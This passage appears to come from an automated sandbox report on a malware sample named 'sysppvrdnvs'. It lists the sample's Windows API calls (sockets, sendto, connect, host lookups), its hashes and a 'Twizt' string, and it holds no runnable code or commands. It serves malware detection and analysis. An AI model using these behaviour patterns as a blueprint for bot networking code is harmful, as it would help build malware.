                                                                                                                                                                                                • Part of subcall function 0040E190: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
                                                                                                                                                                                                • Part of subcall function 0040E190: bind.WS2_32(000000FF,?,00000010), ref: 0040E243
                                                                                                                                                                                                • Part of subcall function 0040E190: lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
                                                                                                                                                                                                • Part of subcall function 0040E190: sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
                                                                                                                                                                                                • Part of subcall function 0040E190: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
                                                                                                                                                                                                • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
                                                                                                                                                                                                • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                                                                                              • String ID: TCP$UDP
                                                                                                                                                                                              • API String ID: 1519345861-1097902612
                                                                                                                                                                                              • Opcode ID: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
                                                                                                                                                                                              • Instruction ID: 4536849a39b1ff6f82dd019fff268beff13b49d9c24eb1714a693627677867a5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
                                                                                                                                                                                              • Instruction Fuzzy Hash: C511B4B4E00208EBDB00EFD6DC45BAE7375AB44708F10896AE5047B2C2D6799E21CB89
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D55C
                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(000000FF), ref: 0040D591
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(000000FF), ref: 0040D694
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Interlocked$DecrementExchangeIncrement
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2813130747-0
                                                                                                                                                                                              • Opcode ID: 2df816f2dcdd0a9ca9d31617e15265b78adafd30e8d8956d26d521e16ddc9f70
                                                                                                                                                                                              • Instruction ID: 92f239bb69865f4ea5ccc2fa5ab36589b1b4cdc7d17313df2dab11b9d7d6be27
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2df816f2dcdd0a9ca9d31617e15265b78adafd30e8d8956d26d521e16ddc9f70
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A41C3B5E00208BBDF00EBE4DC45FAF7B755B04304F048569B5057B2C2D679E54487A9
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenA.KERNEL32(Twizt,?,?,?,?,8@,00000000,8@,0040E038,00000000,00000000), ref: 0040BE7C
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrlen
                                                                                                                                                                                              • String ID: Twizt$Twizt
                                                                                                                                                                                              • API String ID: 1659193697-16428492
                                                                                                                                                                                              • Opcode ID: 1349ff72827666e4cbc29eb052c20b65a3979f5a02af5532c34680a7c0598164
                                                                                                                                                                                              • Instruction ID: 424cb4e193b88585781965e36c58f6fe4c92dd312b0dedf0f064d4bdf42048bf
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1349ff72827666e4cbc29eb052c20b65a3979f5a02af5532c34680a7c0598164
                                                                                                                                                                                              • Instruction Fuzzy Hash: AE113DB5900108BFDB04DFA8D941E9EB7B5EF48304F14C1A9FD19AB342D635EA10CBA6
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 0040D853
                                                                                                                                                                                              • htons.WS2_32(00009E34), ref: 0040D885
                                                                                                                                                                                              • connect.WS2_32(000000FF,?,00000010), ref: 0040D89F
                                                                                                                                                                                                • Part of subcall function 0040B4F0: shutdown.WS2_32(0040B4DD,00000002), ref: 0040B4F9
                                                                                                                                                                                                • Part of subcall function 0040B4F0: closesocket.WS2_32(0040B4DD), ref: 0040B503
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: closesocketconnecthtonsshutdownsocket
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1987800339-0
                                                                                                                                                                                              • Opcode ID: 33603a608139399c0d84bb830c7b48966f7cdbf7a5e618daadc4b0f5ccc7d938
                                                                                                                                                                                              • Instruction ID: fe5c709ea45c5a11aa3c9160e55f3cfd3489188b927fc5d3b71a7e9497cbc338
                                                                                                                                                                                              • Opcode Fuzzy Hash: 33603a608139399c0d84bb830c7b48966f7cdbf7a5e618daadc4b0f5ccc7d938
                                                                                                                                                                                              • Instruction Fuzzy Hash: 91113C74D05209EBCB10DFE4D9096AEB770AF08320F2082A9E525A73D0D7744F05975A
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0040A800: GetCurrentProcessId.KERNEL32(?,0040A76B,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A803
                                                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,0040A777,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A84C
                                                                                                                                                                                              • HeapSetInformation.KERNEL32(02E50000,00000000,00000002,00000004), ref: 0040A876
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0040A87C
                                                                                                                                                                                                • Part of subcall function 0040A890: GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A8AC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process$CurrentHeap$CreateHeapsInformation
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3179415709-0
                                                                                                                                                                                              • Opcode ID: aa0c888e319f0ad9fd531053ca841c15f09ebe8eab889de8fcd1a964cf2e908b
                                                                                                                                                                                              • Instruction ID: 85029bc915bf12f33225f801dda82e4fa7d324228b613a3c41ba46cae7947946
                                                                                                                                                                                              • Opcode Fuzzy Hash: aa0c888e319f0ad9fd531053ca841c15f09ebe8eab889de8fcd1a964cf2e908b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 78F06DB1940305BBD324AB61BC05FA63B65B704305F08C17EEA00DA2D1EB79D810C69E
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0040A800: GetCurrentProcessId.KERNEL32(?,0040A76B,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A803
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(02E50000,?,-0000000C), ref: 0040A7AA
                                                                                                                                                                                              • memset.NTDLL ref: 0040A7E4
                                                                                                                                                                                                • Part of subcall function 0040A820: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,0040A777,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A84C
                                                                                                                                                                                                • Part of subcall function 0040A820: HeapSetInformation.KERNEL32(02E50000,00000000,00000002,00000004), ref: 0040A876
                                                                                                                                                                                                • Part of subcall function 0040A820: GetCurrentProcessId.KERNEL32 ref: 0040A87C
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3494217179-0
                                                                                                                                                                                              • Opcode ID: fa29d78d3ce41ca275254412ae4d96764d92337fc642c65f72d4f93bbf2f11ac
                                                                                                                                                                                              • Instruction ID: 5fdcc54cffe3c60a089a3a898bb23ed8061fd132f88873fc9f8ce54bcf899a2e
                                                                                                                                                                                              • Opcode Fuzzy Hash: fa29d78d3ce41ca275254412ae4d96764d92337fc642c65f72d4f93bbf2f11ac
                                                                                                                                                                                              • Instruction Fuzzy Hash: A71112B5D00208BBCB14EFA5DC45F9E7BB9AF44309F04C169F508AB381D638DA64CB99
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 004013B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
                                                                                                                                                                                                • Part of subcall function 004013B0: socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                                                                                                • Part of subcall function 004013B0: bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                                                                                                • Part of subcall function 0040BBB0: EnterCriticalSection.KERNEL32(004165F8), ref: 0040BBC0
                                                                                                                                                                                                • Part of subcall function 0040BBB0: LeaveCriticalSection.KERNEL32(004165F8), ref: 0040BBEC
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040DFFD
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000006CC,00001388), ref: 0040E047
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3920643007-0
                                                                                                                                                                                              • Opcode ID: 18c62cc6d519b2e8afdf3871f58b5d287ebe97866f2e1beb6f2c6a56a98bb43e
                                                                                                                                                                                              • Instruction ID: 346b0ed27967947cee21f80887d76a0c9fc99ab28eac90287f9a1883fefaa601
                                                                                                                                                                                              • Opcode Fuzzy Hash: 18c62cc6d519b2e8afdf3871f58b5d287ebe97866f2e1beb6f2c6a56a98bb43e
                                                                                                                                                                                              • Instruction Fuzzy Hash: C411A1B5E00208ABE704EBE5DC46FAF7735AB04704F14857AF501772D1E6B9AE50CB98
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • gethostname.WS2_32(?,00000100), ref: 0040B79C
                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 0040B7AE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: gethostbynamegethostname
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3961807697-0
                                                                                                                                                                                              • Opcode ID: 3e0d64d0359f05fd9a79bfd049c8ca7c81df9b12e882189b7266d53aab3380c0
                                                                                                                                                                                              • Instruction ID: d19b970f4f05460fb5f23fa9ea20f915887bff4352c67af57008564f6b42df24
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e0d64d0359f05fd9a79bfd049c8ca7c81df9b12e882189b7266d53aab3380c0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 64112E349042188BCB25DB14C844BD8B779EB65314F14C6DAD48967390C7F96DC5CF89
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: gethostbynameinet_addr
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1594361348-0
                                                                                                                                                                                              • Opcode ID: 46542f40318f5cfb28b81fc8c4f0329da453caff3e113274fd4b0c2f7b1fac6b
                                                                                                                                                                                              • Instruction ID: cf68f0f803e5ad204852fc960aab75f2335c53b4724a48f6e286a6dac7d73619
                                                                                                                                                                                              • Opcode Fuzzy Hash: 46542f40318f5cfb28b81fc8c4f0329da453caff3e113274fd4b0c2f7b1fac6b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 84F0AC78900208EFCB14DFA4E54899DBBB4EB49311F2083A9E905673A0D7749E80DB84
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000006CC,000003E8), ref: 0040BDDE
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(00414FB0), ref: 0040BDF0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DecrementInterlockedObjectSingleWait
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4086267124-0
                                                                                                                                                                                              • Opcode ID: b3d5e5d618c3ee1c5ce6ac09c8534b3c9b924509322a4d5e56075276ed9f4435
                                                                                                                                                                                              • Instruction ID: 5baab0edd941cf9a4a76b18d4dbc399760136ebc64c148788ac0b196bea4a2c6
                                                                                                                                                                                              • Opcode Fuzzy Hash: b3d5e5d618c3ee1c5ce6ac09c8534b3c9b924509322a4d5e56075276ed9f4435
                                                                                                                                                                                              • Instruction Fuzzy Hash: 71D0A93124430867C6106BA2FC4AB9FBA5FEB10714F208433F201F52C0EBB888C196EE
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • shutdown.WS2_32(0040B4DD,00000002), ref: 0040B4F9
                                                                                                                                                                                              • closesocket.WS2_32(0040B4DD), ref: 0040B503
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: closesocketshutdown
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 572888783-0
                                                                                                                                                                                              • Opcode ID: 25f7de04c8b00f8f37ac4a6d3bc42f69888779e154306af29f6f284285fde8ae
                                                                                                                                                                                              • Instruction ID: e588004495cc6a7b8ebd8d82ef2c96d96882889d66b7c68133776882e6b5d849
                                                                                                                                                                                              • Opcode Fuzzy Hash: 25f7de04c8b00f8f37ac4a6d3bc42f69888779e154306af29f6f284285fde8ae
                                                                                                                                                                                              • Instruction Fuzzy Hash: 39C04C7914020CBBCB549FE5EC4DDD97BACFB48751F108455FA098B251CAB6E9808B94
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(004165F8), ref: 0040BBC0
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(004165F8), ref: 0040BBEC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                              • Opcode ID: 7b213cd4d069c01e8a620414b83cfb343b0676d070a872b63673a2a7234e7122
                                                                                                                                                                                              • Instruction ID: 13b3a4f761e8e0ec39884722658b832f986ab9836cdaa210380d175f348a5a39
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b213cd4d069c01e8a620414b83cfb343b0676d070a872b63673a2a7234e7122
                                                                                                                                                                                              • Instruction Fuzzy Hash: A2E09AB0A41204EBCB00DF88FC09B983774E744304F1281B9E81453390EBB4EE80CA8D
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(004165F8,?,0040BDA7), ref: 0040B518
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(004165F8,?,0040BDA7), ref: 0040B528
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                              • Opcode ID: ad8263c65cb201d3706fc4fef9bb1207c721a47fd2d799970df71f2cf60a6b1c
                                                                                                                                                                                              • Instruction ID: 14b8899719e1d7f6bd9f87e5ca311e10c022d8288dc76d62f5c8fe7294ca2835
                                                                                                                                                                                              • Opcode Fuzzy Hash: ad8263c65cb201d3706fc4fef9bb1207c721a47fd2d799970df71f2cf60a6b1c
                                                                                                                                                                                              • Instruction Fuzzy Hash: BDB09B701C1329B7810037D5BC0B7C43E29D544B1539380F6B51954195AEE555C0555D
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • send.WS2_32(00000000,00000000,?,00000000), ref: 0040D72F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: send
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2809346765-0
                                                                                                                                                                                              • Opcode ID: 06370eea5684355e58e3ecca2704a58af4611f1d3e16c80e6b4b5217ad5f95b8
                                                                                                                                                                                              • Instruction ID: e7aa79f816f91947af6fbc74e9c8fbfd3bb2dea631739c5f8479ec5b7c0f5cfd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 06370eea5684355e58e3ecca2704a58af4611f1d3e16c80e6b4b5217ad5f95b8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 58013C3890438DEFCB00DFA8C888BDE7BB4BB08314F1085A9EC55A7380D3B59699CB55
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0040BBB0: EnterCriticalSection.KERNEL32(004165F8), ref: 0040BBC0
                                                                                                                                                                                                • Part of subcall function 0040BBB0: LeaveCriticalSection.KERNEL32(004165F8), ref: 0040BBEC
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000006CC,00001388), ref: 0040D95C
                                                                                                                                                                                                • Part of subcall function 0040D550: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D55C
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$EnterExchangeInterlockedLeaveObjectSingleWait
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3309573332-0
                                                                                                                                                                                              • Opcode ID: dea414f55044976029bfea1705a47b8f4b0a5085fa57cca7b4be92acb39eaa1a
                                                                                                                                                                                              • Instruction ID: 2ee0a3073efd4fba8235a9b1d7a198457ec1c10d5c824cc9a6b08d4439e9405f
                                                                                                                                                                                              • Opcode Fuzzy Hash: dea414f55044976029bfea1705a47b8f4b0a5085fa57cca7b4be92acb39eaa1a
                                                                                                                                                                                              • Instruction Fuzzy Hash: E3E092B1D40308A7C714E7E5A806BAF762A9710305F54407AF600762C1DA799A44D7DC
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 542301482-0
                                                                                                                                                                                              • Opcode ID: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                                                                                                                                              • Instruction ID: d29105fc803771725095f39a6bc68a1d0ed1c954ca33f5653c88c8c6fc3524cf
